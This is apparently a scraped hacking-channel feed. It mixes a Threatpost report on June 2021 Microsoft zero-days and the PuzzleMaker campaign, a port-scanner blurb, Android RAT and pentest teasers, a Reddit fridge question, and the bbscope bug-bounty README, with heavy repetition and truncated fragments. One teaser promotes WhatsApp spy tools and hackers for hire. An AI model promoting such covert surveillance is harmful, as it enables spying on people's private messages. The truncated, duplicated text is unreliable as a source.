Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Best Whatsapp Hacking Tools — Ripely Effective Messaging Spy Tool
https://cdn-images-1.medium.com/max/800/1*Fb1ANJT8-Ib31WURCQ898A.jpeg
Is there really such a thing as the Best Whatsapp Hacker for Hire? There are so many versions of Whimsical Hacker in the market that it..
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Best Whatsapp Hacking Tools — Ripely Effective Messaging Spy Tool
https://cdn-images-1.medium.com/max/800/1*Fb1ANJT8-Ib31WURCQ898A.jpeg
Is there really such a thing as the Best Whatsapp Hacker for Hire? There are so many versions of Whimsical Hacker in the market that it..
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Best Whatsapp Hacking Tools — Ripely Effective Messaging Spy Tool
Is there really such a thing as the Best Whatsapp Hacker for Hire? There are so many versions of Whimsical Hacker in the market that it..
Hacking Articles Tips Tricks Videos Tutorials
Photo
Black Hat Ethical Hacking
Microsoft Patch Tuesday Fixes 6 In-The-Wild Exploits, 50 Flaws
https://www.blackhatethicalhacking.com/wp-content/uploads/2017/11/black-hat-locks-and-electronics.jpg Microsoft Patch Tuesday Fixes 6 In-The-Wild Exploits, 50 FlawsPost Views: 53
Reading Time: 2 Minutes
Researchers discovered a highly targeted malware campaign launched in April, in which a new, unknown threat actor used two of the vulnerabilities that Microsoft said are under active attack.
Microsoft jumped on 50 vulnerabilities in this month’s Patch Tuesday update, issuing fixes for CVEs in Microsoft Windows, .NET Core and Visual Studio, Microsoft Office, Microsoft Edge (Chromium-based and EdgeHTML), SharePoint Server, Hyper-V, Visual Studio Code – Kubernetes Tools, Windows HTML Platform, and Windows Remote Desktop.
Five of the CVEs are rated Critical and 45 are rated Important in severity. Microsoft reported that six of the bugs are currently under active attack, while three are publicly known at the time of release.
The number might seem light – it represents six fewer patches than Microsoft released in May – but the number of critical vulnerabilities ticked up to five month-over-month.
Those actively exploited vulnerabilities can enable an attacker to hijack a system. They have no workarounds, so some security experts are recommending that they be patched as the highest priority.
The six CVEs under active attack in the wild include four elevation of privilege vulnerabilities, one information disclosure vulnerability and one remote code execution (RCE) vulnerability.
See Also: RockYou2021: largest password compilation of all time leaked online – 8.4 billion entries Critical Bugs of NoteCVE-2021-31985 is a critical RCE vulnerability in Microsoft’s Defender antimalware software that should grab attention. A similar, critical bug in Defender was patched in January. The most serious of the year’s first Patch Tuesday, that earlier Defender bug was an RCE vulnerability that came under active exploit.
Another critical flaw is CVE-2021-31963, a Microsoft SharePoint Server RCE vulnerability. Jay Goodman, director of product marketing at Automox, said in a blog post that an attacker exploiting this vulnerability “could take control of a system where they would be free to install programs, view or change data, or create new accounts on the target system with full user rights.”
While Microsoft reports that this vulnerability is less likely to be exploited,Goodman suggested that organizations don’t let it slide: “Patching critical vulnerabilities in the 72-hour window before attackers can weaponize is an important first step to maintaining a safe and secure infrastructure,” he observed. https://media.threatpost.com/wp-content/uploads/sites/103/2021/06/08141612/Sophos-impact-chart-June-21-patch-Tuesday-e1623176186946.png A year-to-date summary of 2021 Microsoft vulnerability releases as of June. Source: Sophos
See Also: Offensive Security Tool: Pacu – The Amazon Web Services Exploitation Framework Bugs Exploited in the WildMicrosoft fixed a total of seven zero-day vulnerabilities. One was CVE-2021-31968, Windows Remote Desktop Services Denial of Service Vulnerability that was publicly disclosed but hasn’t been seen in attacks. It was issued a CVSS score of 7.5.
These are the six flaws that MIcrosoft said are under active attack, all of them also zero days.
* CVE-2021-31955 – Windows Kernel Information Disclosure Vulnerability. Rating: Important. CVSS 5.5
* CVE-2021-31956 – Windows NTFS Elevation of Privilege Vulnerability. Rating: Important. CVSS 7.8
* CVE-2021-33739 – Microsoft DWM Core Library Elevation of Privilege Vulnerability. Rating: Importa[...]
___________________________
@hacking_Attack
@Hacking_Video
Microsoft Patch Tuesday Fixes 6 In-The-Wild Exploits, 50 Flaws
https://www.blackhatethicalhacking.com/wp-content/uploads/2017/11/black-hat-locks-and-electronics.jpg Microsoft Patch Tuesday Fixes 6 In-The-Wild Exploits, 50 FlawsPost Views: 53
Reading Time: 2 Minutes
Researchers discovered a highly targeted malware campaign launched in April, in which a new, unknown threat actor used two of the vulnerabilities that Microsoft said are under active attack.
Microsoft jumped on 50 vulnerabilities in this month’s Patch Tuesday update, issuing fixes for CVEs in Microsoft Windows, .NET Core and Visual Studio, Microsoft Office, Microsoft Edge (Chromium-based and EdgeHTML), SharePoint Server, Hyper-V, Visual Studio Code – Kubernetes Tools, Windows HTML Platform, and Windows Remote Desktop.
Five of the CVEs are rated Critical and 45 are rated Important in severity. Microsoft reported that six of the bugs are currently under active attack, while three are publicly known at the time of release.
The number might seem light – it represents six fewer patches than Microsoft released in May – but the number of critical vulnerabilities ticked up to five month-over-month.
Those actively exploited vulnerabilities can enable an attacker to hijack a system. They have no workarounds, so some security experts are recommending that they be patched as the highest priority.
The six CVEs under active attack in the wild include four elevation of privilege vulnerabilities, one information disclosure vulnerability and one remote code execution (RCE) vulnerability.
See Also: RockYou2021: largest password compilation of all time leaked online – 8.4 billion entries Critical Bugs of NoteCVE-2021-31985 is a critical RCE vulnerability in Microsoft’s Defender antimalware software that should grab attention. A similar, critical bug in Defender was patched in January. The most serious of the year’s first Patch Tuesday, that earlier Defender bug was an RCE vulnerability that came under active exploit.
Another critical flaw is CVE-2021-31963, a Microsoft SharePoint Server RCE vulnerability. Jay Goodman, director of product marketing at Automox, said in a blog post that an attacker exploiting this vulnerability “could take control of a system where they would be free to install programs, view or change data, or create new accounts on the target system with full user rights.”
While Microsoft reports that this vulnerability is less likely to be exploited,Goodman suggested that organizations don’t let it slide: “Patching critical vulnerabilities in the 72-hour window before attackers can weaponize is an important first step to maintaining a safe and secure infrastructure,” he observed. https://media.threatpost.com/wp-content/uploads/sites/103/2021/06/08141612/Sophos-impact-chart-June-21-patch-Tuesday-e1623176186946.png A year-to-date summary of 2021 Microsoft vulnerability releases as of June. Source: Sophos
See Also: Offensive Security Tool: Pacu – The Amazon Web Services Exploitation Framework Bugs Exploited in the WildMicrosoft fixed a total of seven zero-day vulnerabilities. One was CVE-2021-31968, Windows Remote Desktop Services Denial of Service Vulnerability that was publicly disclosed but hasn’t been seen in attacks. It was issued a CVSS score of 7.5.
These are the six flaws that MIcrosoft said are under active attack, all of them also zero days.
* CVE-2021-31955 – Windows Kernel Information Disclosure Vulnerability. Rating: Important. CVSS 5.5
* CVE-2021-31956 – Windows NTFS Elevation of Privilege Vulnerability. Rating: Important. CVSS 7.8
* CVE-2021-33739 – Microsoft DWM Core Library Elevation of Privilege Vulnerability. Rating: Importa[...]
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Black Hat Ethical Hacking Microsoft Patch Tuesday Fixes 6 In-The-Wild Exploits, 50 Flaws https://www.blackhatethicalhacking.com/wp-content/uploads/2017/11/black-hat-locks-and-electronics.jpg Microsoft Patch Tuesday Fixes 6 In-The-Wild Exploits, 50 FlawsPost…
nt. CVSS 8.4
* CVE-2021-33742 – Windows MSHTML Platform Remote Code Execution Vulnerability. Rating: Critical. CVSS 7.5
* CVE-2021-31199 – Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability. Rating: Important. CVSS 5.2
* CVE-2021-31201 – Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability. Rating: Important. CVSS 5.2 CVE-2021-33742This RCE vulnerability exploits MSHTML, a component used by the Internet Explorer engine to read and display content from websites.The bug could allow an attacker to execute code on a target system if a user views specially crafted web content. The Zero Day Initiative‘s (ZDI’s) Dustin Childs noted in his Patch Tuesday analysis that since the vulnerability is in the Trident (MSHTML) engine itself, many different applications are affected, not just Internet Explorer. “It’s not clear how widespread the active attacks are, but considering the vulnerability impacts all supported Windows versions, this should be at the top of your test and deploy list,” he recommended.
The vulnerability doesn’t require special privilege to exploit, though the attack complexity is high, if that’s any consolation. An attacker would need to do some extra legwork to pull it off, noted Satnam Narang, staff research engineer at Tenable, in an email to Threatpost on Tuesday.
Immersive Labs’ Kevin Breen, director of cyber threat research, noted that visiting a website in a vulnerable browser is “a simple way for attackers to deliver this exploit.” He told Threatpost via email on Tuesday that since the library is used by other services and applications, “emailing HTML files as part of a phishing campaign is also a viable method of delivery.” Sophos decreed this one to be the top concern of this month’s crop, given that it’s already being actively exploited by malicious actors. See Also: Jeff Moss, aka Dark Tangent, the person who founded DEF CON and Black Hat CVE-2021-31955, CVE-2021-31956: Used in PuzzleMaker Targeted MalwareCVE-2021-31955 is an information disclosure vulnerability in the Windows Kernel, while CVE-2021-31956 is an elevation of privilege vulnerability in Windows NTFS. The ZDI’s Childs noted that CVE-2021-31956 was reported by the same researcher who found CVE-2021-31955, an information disclosure bug also listed as under active attack. They could be linked, he suggested: “It’s possible these bugs were used in conjunction, as that is a common technique – use a memory leak to get the address needed to escalate privileges. These bugs are important on their own and could be even worse when combined. Definitely prioritize the testing and deployment of these patches.”
He was spot-on. On Tuesday, Kaspersky announced that its researchers had discovered a highly targeted malware campaign launched in April against multiple companies, in which a previously unknown threat actor used a chain of Chrome and Windows zero-day exploits: Namely, these two.
In a press release, Kaspersky said that one of the exploits was used for RCE in the Google Chrome web browser, while the other was an elevation of privilege exploit fine-tuned to target “the latest and most prominent builds” of Windows 10.
“Recent months have seen a wave of advanced threat activity exploiting zero-days in the wild,” according to the release. “In mid-April, Kaspersky experts discovered yet a new series of highly targeted exploit attacks against multiple companies that allowed the attackers to stealthily compromise the targeted networks.”
Kaspersky hasn’t yet found a connection between these attacks and any known threat actors, so it’s gone ahead and dubbed the actor PuzzleMaker. It said that all the attacks were conducted through Chrome and used an exploit that allowed for RCE. Kaspersky researchers weren’t able to retrieve the code for the exploit, but the timeline and availability suggests the attackers were using the now-patched CVE-2021-21224 [...]
___________________________
@hacking_Attack
@Hacking_Video
* CVE-2021-33742 – Windows MSHTML Platform Remote Code Execution Vulnerability. Rating: Critical. CVSS 7.5
* CVE-2021-31199 – Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability. Rating: Important. CVSS 5.2
* CVE-2021-31201 – Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability. Rating: Important. CVSS 5.2 CVE-2021-33742This RCE vulnerability exploits MSHTML, a component used by the Internet Explorer engine to read and display content from websites.The bug could allow an attacker to execute code on a target system if a user views specially crafted web content. The Zero Day Initiative‘s (ZDI’s) Dustin Childs noted in his Patch Tuesday analysis that since the vulnerability is in the Trident (MSHTML) engine itself, many different applications are affected, not just Internet Explorer. “It’s not clear how widespread the active attacks are, but considering the vulnerability impacts all supported Windows versions, this should be at the top of your test and deploy list,” he recommended.
The vulnerability doesn’t require special privilege to exploit, though the attack complexity is high, if that’s any consolation. An attacker would need to do some extra legwork to pull it off, noted Satnam Narang, staff research engineer at Tenable, in an email to Threatpost on Tuesday.
Immersive Labs’ Kevin Breen, director of cyber threat research, noted that visiting a website in a vulnerable browser is “a simple way for attackers to deliver this exploit.” He told Threatpost via email on Tuesday that since the library is used by other services and applications, “emailing HTML files as part of a phishing campaign is also a viable method of delivery.” Sophos decreed this one to be the top concern of this month’s crop, given that it’s already being actively exploited by malicious actors. See Also: Jeff Moss, aka Dark Tangent, the person who founded DEF CON and Black Hat CVE-2021-31955, CVE-2021-31956: Used in PuzzleMaker Targeted MalwareCVE-2021-31955 is an information disclosure vulnerability in the Windows Kernel, while CVE-2021-31956 is an elevation of privilege vulnerability in Windows NTFS. The ZDI’s Childs noted that CVE-2021-31956 was reported by the same researcher who found CVE-2021-31955, an information disclosure bug also listed as under active attack. They could be linked, he suggested: “It’s possible these bugs were used in conjunction, as that is a common technique – use a memory leak to get the address needed to escalate privileges. These bugs are important on their own and could be even worse when combined. Definitely prioritize the testing and deployment of these patches.”
He was spot-on. On Tuesday, Kaspersky announced that its researchers had discovered a highly targeted malware campaign launched in April against multiple companies, in which a previously unknown threat actor used a chain of Chrome and Windows zero-day exploits: Namely, these two.
In a press release, Kaspersky said that one of the exploits was used for RCE in the Google Chrome web browser, while the other was an elevation of privilege exploit fine-tuned to target “the latest and most prominent builds” of Windows 10.
“Recent months have seen a wave of advanced threat activity exploiting zero-days in the wild,” according to the release. “In mid-April, Kaspersky experts discovered yet a new series of highly targeted exploit attacks against multiple companies that allowed the attackers to stealthily compromise the targeted networks.”
Kaspersky hasn’t yet found a connection between these attacks and any known threat actors, so it’s gone ahead and dubbed the actor PuzzleMaker. It said that all the attacks were conducted through Chrome and used an exploit that allowed for RCE. Kaspersky researchers weren’t able to retrieve the code for the exploit, but the timeline and availability suggests the attackers were using the now-patched CVE-2021-21224 [...]
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
nt. CVSS 8.4 * CVE-2021-33742 – Windows MSHTML Platform Remote Code Execution Vulnerability. Rating: Critical. CVSS 7.5 * CVE-2021-31199 – Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability. Rating: Important. CVSS 5.2 * CVE-2021…
vulnerability in Chrome and Chromium browsers that allows attackers to exploit the Chrome renderer process (the processes that are responsible for what happens inside users’ tabs).
Kaspersky experts did find and analyze the second exploit, however: An elevation of privilege exploit that exploits two distinct vulnerabilities in the Microsoft Windows OS kernel: CVE-2021-31955 and CVE-2021-31956. The CVE-2021-31955 bug “is affiliated with SuperFetch, a feature first introduced in Windows Vista that aims to reduce software loading times by pre-loading commonly used applications into memory,” they explained.
The second flaw, CVE-2021-31956, is an Elevation of Privilege vulnerability and heap-based buffer overflow. Kaspersky said that attackers used this vulnerability alongside Windows Notification Facility (WNF) “to create arbitrary memory read/write primitives and execute malware modules with system privileges.”
“Once the attackers have used both the Chrome and Windows exploits to gain a foothold in the targeted system, the stager module downloads and executes a more complex malware dropper from a remote server,” they continued. “This dropper then installs two executables, which pretend to be legitimate files belonging to Microsoft Windows OS. The second of these two executables is a remote shell module, which is able to download and upload files, create processes, sleep for certain periods of time, and delete itself from the infected system.”
Boris Larin, senior security researcher with Kaspersky’s Global Research and Analysis Team (GReAT), said that the team hasn’t been able to link these highly targeted attacks to any known threat actor: Hence the name PuzzleMaker and the determination to closely monitor the security landscape “for future activity or new insights about this group,” he was quoted as saying in the press release.
If the current trend is any indication, expect to see more of the same, Larin said. “Overall, of late, we’ve been seeing several waves of high-profile threat activity being driven by zero-day exploits,” he said. “It’s a reminder that zero days continue to be the most effective method for infecting targets. Now that these vulnerabilities have been made publicly known, it’s possible that we’ll see an increase of their usage in attacks by this and other threat actors. That means it’s very important for users to download the latest patch from Microsoft as soon as possible.” CVE-2021-31199/CVE-2021-31201The two Enhanced Cryptographic Provider Elevation of Privilege vulnerabilities are linked to the Adobe Reader bug that came under active attack last month (CVE-2021-28550), ZDI explained. “It’s common to see privilege escalation paired with code execution bugs, and it seems these two vulnerabilities were the privilege escalation part of those exploits,” he explained. “It is a bit unusual to see a delay between patch availability between the different parts of an active attack, but good to see these holes now getting closed.” CVE-2021-33739Breen noted that privilege escalation vulnerabilities such as this one in the Microsoft DWM Core Library are just as valuable to attackers as RCEs. “Once they have gained an initial foothold, they can move laterally across the network and uncover further ways to escalate to system or domain-level access,” he said. “This can be hugely damaging in the event of ransomware attacks, where high privileges can enable the attackers to stop or destroy backups and other security tools.”
Source: threatpost.com (Click Link)Recent News* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/Untitled-design-1-1-90x90.png RockYou2021: largest password compilation of all time leaked online – 8.4 billion entries17 hours ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/microsoft-exploit-90x90.jpg Windows Container Malware Targets Kubernetes Clusters1 day ago
* https://www.blackhatethicalhacking[...]
___________________________
@hacking_Attack
@Hacking_Video
Kaspersky experts did find and analyze the second exploit, however: An elevation of privilege exploit that exploits two distinct vulnerabilities in the Microsoft Windows OS kernel: CVE-2021-31955 and CVE-2021-31956. The CVE-2021-31955 bug “is affiliated with SuperFetch, a feature first introduced in Windows Vista that aims to reduce software loading times by pre-loading commonly used applications into memory,” they explained.
The second flaw, CVE-2021-31956, is an Elevation of Privilege vulnerability and heap-based buffer overflow. Kaspersky said that attackers used this vulnerability alongside Windows Notification Facility (WNF) “to create arbitrary memory read/write primitives and execute malware modules with system privileges.”
“Once the attackers have used both the Chrome and Windows exploits to gain a foothold in the targeted system, the stager module downloads and executes a more complex malware dropper from a remote server,” they continued. “This dropper then installs two executables, which pretend to be legitimate files belonging to Microsoft Windows OS. The second of these two executables is a remote shell module, which is able to download and upload files, create processes, sleep for certain periods of time, and delete itself from the infected system.”
Boris Larin, senior security researcher with Kaspersky’s Global Research and Analysis Team (GReAT), said that the team hasn’t been able to link these highly targeted attacks to any known threat actor: Hence the name PuzzleMaker and the determination to closely monitor the security landscape “for future activity or new insights about this group,” he was quoted as saying in the press release.
If the current trend is any indication, expect to see more of the same, Larin said. “Overall, of late, we’ve been seeing several waves of high-profile threat activity being driven by zero-day exploits,” he said. “It’s a reminder that zero days continue to be the most effective method for infecting targets. Now that these vulnerabilities have been made publicly known, it’s possible that we’ll see an increase of their usage in attacks by this and other threat actors. That means it’s very important for users to download the latest patch from Microsoft as soon as possible.” CVE-2021-31199/CVE-2021-31201The two Enhanced Cryptographic Provider Elevation of Privilege vulnerabilities are linked to the Adobe Reader bug that came under active attack last month (CVE-2021-28550), ZDI explained. “It’s common to see privilege escalation paired with code execution bugs, and it seems these two vulnerabilities were the privilege escalation part of those exploits,” he explained. “It is a bit unusual to see a delay between patch availability between the different parts of an active attack, but good to see these holes now getting closed.” CVE-2021-33739Breen noted that privilege escalation vulnerabilities such as this one in the Microsoft DWM Core Library are just as valuable to attackers as RCEs. “Once they have gained an initial foothold, they can move laterally across the network and uncover further ways to escalate to system or domain-level access,” he said. “This can be hugely damaging in the event of ransomware attacks, where high privileges can enable the attackers to stop or destroy backups and other security tools.”
Source: threatpost.com (Click Link)Recent News* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/Untitled-design-1-1-90x90.png RockYou2021: largest password compilation of all time leaked online – 8.4 billion entries17 hours ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/microsoft-exploit-90x90.jpg Windows Container Malware Targets Kubernetes Clusters1 day ago
* https://www.blackhatethicalhacking[...]
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
vulnerability in Chrome and Chromium browsers that allows attackers to exploit the Chrome renderer process (the processes that are responsible for what happens inside users’ tabs). Kaspersky experts did find and analyze the second exploit, however: An elevation…
.com/wp-content/uploads/2021/06/1_6QWMn0DApM4jmbubKuCmNA-90x90.png GitHub’s new policies allow removal of PoC exploits used in attacks2 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/Untitled-design-2-90x90.png Google PPC Ads Used to Deliver Infostealers5 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/Untitled-design-1-90x90.png Researchers Uncover Hacking Operations Targeting Government Entities in South Korea6 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/ransomware-payment-90x90.jpg Cyber-Insurance Fuels Ransomware Payment Surge1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/banner-2021.2-release-90x90.png Kali Linux 2021.2 Release (Kaboxer, Kali-Tweaks, Bleeding-Edge & Privileged Ports)1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/ezgif.com-gif-maker-90x90.jpg Cyber attack hits JBS meat works in Australia, North America1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/05/HPE-corp-logo-1-90x90.jpg HPE Fixes Critical Zero-Day in Server Management Software1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/05/vmware-patch-90x90.jpg VMware Sounds Ransomware Alarm Over Critical Severity Bug2 weeks ago
The post Microsoft Patch Tuesday Fixes 6 In-The-Wild Exploits, 50 Flaws first appeared on Black Hat Ethical Hacking.
___________________________
@hacking_Attack
@Hacking_Video
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/Untitled-design-2-90x90.png Google PPC Ads Used to Deliver Infostealers5 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/Untitled-design-1-90x90.png Researchers Uncover Hacking Operations Targeting Government Entities in South Korea6 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/ransomware-payment-90x90.jpg Cyber-Insurance Fuels Ransomware Payment Surge1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/banner-2021.2-release-90x90.png Kali Linux 2021.2 Release (Kaboxer, Kali-Tweaks, Bleeding-Edge & Privileged Ports)1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/ezgif.com-gif-maker-90x90.jpg Cyber attack hits JBS meat works in Australia, North America1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/05/HPE-corp-logo-1-90x90.jpg HPE Fixes Critical Zero-Day in Server Management Software1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/05/vmware-patch-90x90.jpg VMware Sounds Ransomware Alarm Over Critical Severity Bug2 weeks ago
The post Microsoft Patch Tuesday Fixes 6 In-The-Wild Exploits, 50 Flaws first appeared on Black Hat Ethical Hacking.
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
DivideAndScan : Divide Full Port Scan Results And Use It For Targeted Nmap Runs
DivideAndScan is used to efficiently automate port scanning routine by splitting it into 3 phases: Discover open ports for a bunch of targets. Run Nmap individually for each target with version grabbing and NSE actions. Merge the results into a single Nmap report (different formats available). For the 1st phase a fast port scanner is intended to […]
The post DivideAndScan : Divide Full Port Scan Results And Use It For Targeted Nmap Runs appeared first on Kali Linux Tutorials.
___________________________
@hacking_Attack
@Hacking_Video
DivideAndScan : Divide Full Port Scan Results And Use It For Targeted Nmap Runs
DivideAndScan is used to efficiently automate port scanning routine by splitting it into 3 phases: Discover open ports for a bunch of targets. Run Nmap individually for each target with version grabbing and NSE actions. Merge the results into a single Nmap report (different formats available). For the 1st phase a fast port scanner is intended to […]
The post DivideAndScan : Divide Full Port Scan Results And Use It For Targeted Nmap Runs appeared first on Kali Linux Tutorials.
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
DivideAndScan : Divide Full Port Scan Results ,Use For Targeted Nmap
DivideAndScan is used to efficiently automate port scanning routine by splitting it into 3 phases: Discover , Run and Merge
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
همه چیز درباره رات اندروید برای هک گوشی های اندرویدی
https://cdn-images-1.medium.com/max/600/1*dNd9Tx46q6hEvDozX-ogSw.jpeg
رات اندروید چیست؟ Android Rat چگونه در گوشی های اندرویدی اجرا می شود؟ راه های جلوگیری از وارد شدن برنامه های رات اندرویدی به گوشی چیست؟…
Continue reading on Medium »
همه چیز درباره رات اندروید برای هک گوشی های اندرویدی
https://cdn-images-1.medium.com/max/600/1*dNd9Tx46q6hEvDozX-ogSw.jpeg
رات اندروید چیست؟ Android Rat چگونه در گوشی های اندرویدی اجرا می شود؟ راه های جلوگیری از وارد شدن برنامه های رات اندرویدی به گوشی چیست؟…
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Insecure Deserialization
https://cdn-images-1.medium.com/max/600/0*N8pVojFQ0clQgzrn.jpg
A pentester’s guide to insecure deserialization
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Insecure Deserialization
https://cdn-images-1.medium.com/max/600/0*N8pVojFQ0clQgzrn.jpg
A pentester’s guide to insecure deserialization
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Insecure Deserialization
A pentester’s guide to insecure deserialization
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Interdimensional Internet HackTheBox writeup
https://cdn-images-1.medium.com/max/600/1*0YXLpyRsBa49DOcV96Zc5A.png
This CTF is ranked as medium with a user rating of it being a brain-f*ck. I enjoyed this CTF and in hopes of helping/teaching others the…
Continue reading on Medium »
Interdimensional Internet HackTheBox writeup
https://cdn-images-1.medium.com/max/600/1*0YXLpyRsBa49DOcV96Zc5A.png
This CTF is ranked as medium with a user rating of it being a brain-f*ck. I enjoyed this CTF and in hopes of helping/teaching others the…
Continue reading on Medium »
hacking: security in practice
Fridge improvements
How would I go about trying to reprogram my fridge to let me dispense water from the left door (where the water and ice dispenser is) when it is closed and not worry about whether the right door is open or closed? At the current moment, both doors need to be closed for any function of the dispenser to work.
After finding the model number and buying the right connector to interface with it now what? What language are fridges programmed in and how do I go about debugging the code to find the code for the door? Anyone tinkered with their fridge?
submitted by /u/DarkMonkey98
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Fridge improvements
How would I go about trying to reprogram my fridge to let me dispense water from the left door (where the water and ice dispenser is) when it is closed and not worry about whether the right door is open or closed? At the current moment, both doors need to be closed for any function of the dispenser to work.
After finding the model number and buying the right connector to interface with it now what? What language are fridges programmed in and how do I go about debugging the code to find the code for the door? Anyone tinkered with their fridge?
submitted by /u/DarkMonkey98
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Fridge improvements
How would I go about trying to reprogram my fridge to let me dispense water from the left door (where the water and ice dispenser is) when it is...
Bbscope - Scope Gathering Tool For HackerOne, Bugcrowd, And Intigriti!
http://www.kitploit.com/2021/06/bbscope-scope-gathering-tool-for.html
http://www.kitploit.com/2021/06/bbscope-scope-gathering-tool-for.html
The ultimate scope gathering (https://www.kitploit.com/search/label/Gathering) tool for HackerOne, Bugcrowd, and Intigriti (https://www.kitploit.com/search/label/Intigriti) by sw33tLie. Need to grep all the large scope domains that you've got on your bug bounty platforms? This is the right tool for the job.
What about getting a list of android apps that you are allowed to test? We've got you covered as well. Reverse engineering god? No worries, you can get a list of binaries to analyze too :)
Installation
Make sure you've a recent version of the Go compiler installed on your system. Then just run: GO111MODULE=on go get -u github.com/sw33tLie/bbscope
Usage
">bbscope (h1|bc|it) -t
How to get the session token: HackerOne: login, then grab the __Host-session cookie Bugcrowd: login, then grab the _crowdcontrol_session cookie Intigriti: login, then intercept (https://www.kitploit.com/search/label/Intercept) a request to api.intigriti.com and look for the Authentication: Bearer XXX header. XXX is your token Remember that you can use the --help flag to get a description for all flags.
Examples
Below you'll find some example commands. Keep in mind that all of them work with Bugcrowd and Intigriti subcommands (bc and it) as well, not just with h1.
Print all in-scope targets from all your HackerOne programs that offer rewards
-b -o t ">bbscope h1 -t -b -o t
The output will look like this: app.example.com
*.user.example.com
*.demo.com
www.something.com
Print all in-scope targets from all your private HackerOne programs that offer rewards
-b -p -o t ">bbscope h1 -t -b -p -o t
Print all in-scope Android APKs from all your HackerOne programs
-o t -c android ">bbscope h1 -t -o t -c android
Print all in-scope targets from all your HackerOne programs with extra data
-o tdu -d ", " '>bbscope h1 -t -o tdu -d ", "
This will print a list of in-scope targets from all your HackerOne programs (including public ones and VDPs) but, on the same line, it will also print the target description (when available) and the program's URL. It might look like this: something.com, Something's main website, https://hackerone.com/something
*.demo.com, All assets owned by Demo are in scope, https://hackerone.com/demo
Get program URLs for your HackerOne private programs
-o u -p | sort -u ">bbscope h1 -t -o u -p | sort -u
You'll get a list like this: https://hackerone.com/demo
https://hackerone.com/something
Beware of scope oddities
In an ideal world, all programs use the in-scope table in the same way to clearly show what's in scope, and make parsing easy. Unfortunately, that's not always the case. Sometimes assets are assigned the wrong category. For example, if you're going after URLs using the -c url, double checking using -c all is often a good idea. Other times, on HackerOne, you will find targets written in the scope description, instead of in the scope title. A few programs that do this are: Verizon Media (https://hackerone.com/verizonmedia/?type=team) Mail.ru (https://hackerone.com/mailru) If you want to grep those URLs as well, you MUST include d in the printing options flag (-o). Sometimes it gets even stranger: Spotify (https://hackerone.com/spotify) uses titles of the in-scope table to list wildcards, but then lists the actually in-scope subdomains (https://www.kitploit.com/search/label/Subdomains) in the targets description. Human minds are weird and this tool does not attempt to parse nonsense, you'll have to do that manually (or bother people that can make this change, maybe?).
Thanks
0xatul (https://github.com/0xatul) JoeMilian (https://github.com/JoeMilian) ByteOven (https://github.com/ByteOven) dee-see (https://gitlab.com/dee-see) jub0bs (https://jub0bs.com/)
Download Bbscope (https://github.com/sw33tLie/bbscope)
What about getting a list of android apps that you are allowed to test? We've got you covered as well. Reverse engineering god? No worries, you can get a list of binaries to analyze too :)
Installation
Make sure you've a recent version of the Go compiler installed on your system. Then just run: GO111MODULE=on go get -u github.com/sw33tLie/bbscope
Usage
">bbscope (h1|bc|it) -t
How to get the session token: HackerOne: login, then grab the __Host-session cookie Bugcrowd: login, then grab the _crowdcontrol_session cookie Intigriti: login, then intercept (https://www.kitploit.com/search/label/Intercept) a request to api.intigriti.com and look for the Authentication: Bearer XXX header. XXX is your token Remember that you can use the --help flag to get a description for all flags.
Examples
Below you'll find some example commands. Keep in mind that all of them work with Bugcrowd and Intigriti subcommands (bc and it) as well, not just with h1.
Print all in-scope targets from all your HackerOne programs that offer rewards
-b -o t ">bbscope h1 -t -b -o t
The output will look like this: app.example.com
*.user.example.com
*.demo.com
www.something.com
Print all in-scope targets from all your private HackerOne programs that offer rewards
-b -p -o t ">bbscope h1 -t -b -p -o t
Print all in-scope Android APKs from all your HackerOne programs
-o t -c android ">bbscope h1 -t -o t -c android
Print all in-scope targets from all your HackerOne programs with extra data
-o tdu -d ", " '>bbscope h1 -t -o tdu -d ", "
This will print a list of in-scope targets from all your HackerOne programs (including public ones and VDPs) but, on the same line, it will also print the target description (when available) and the program's URL. It might look like this: something.com, Something's main website, https://hackerone.com/something
*.demo.com, All assets owned by Demo are in scope, https://hackerone.com/demo
Get program URLs for your HackerOne private programs
-o u -p | sort -u ">bbscope h1 -t -o u -p | sort -u
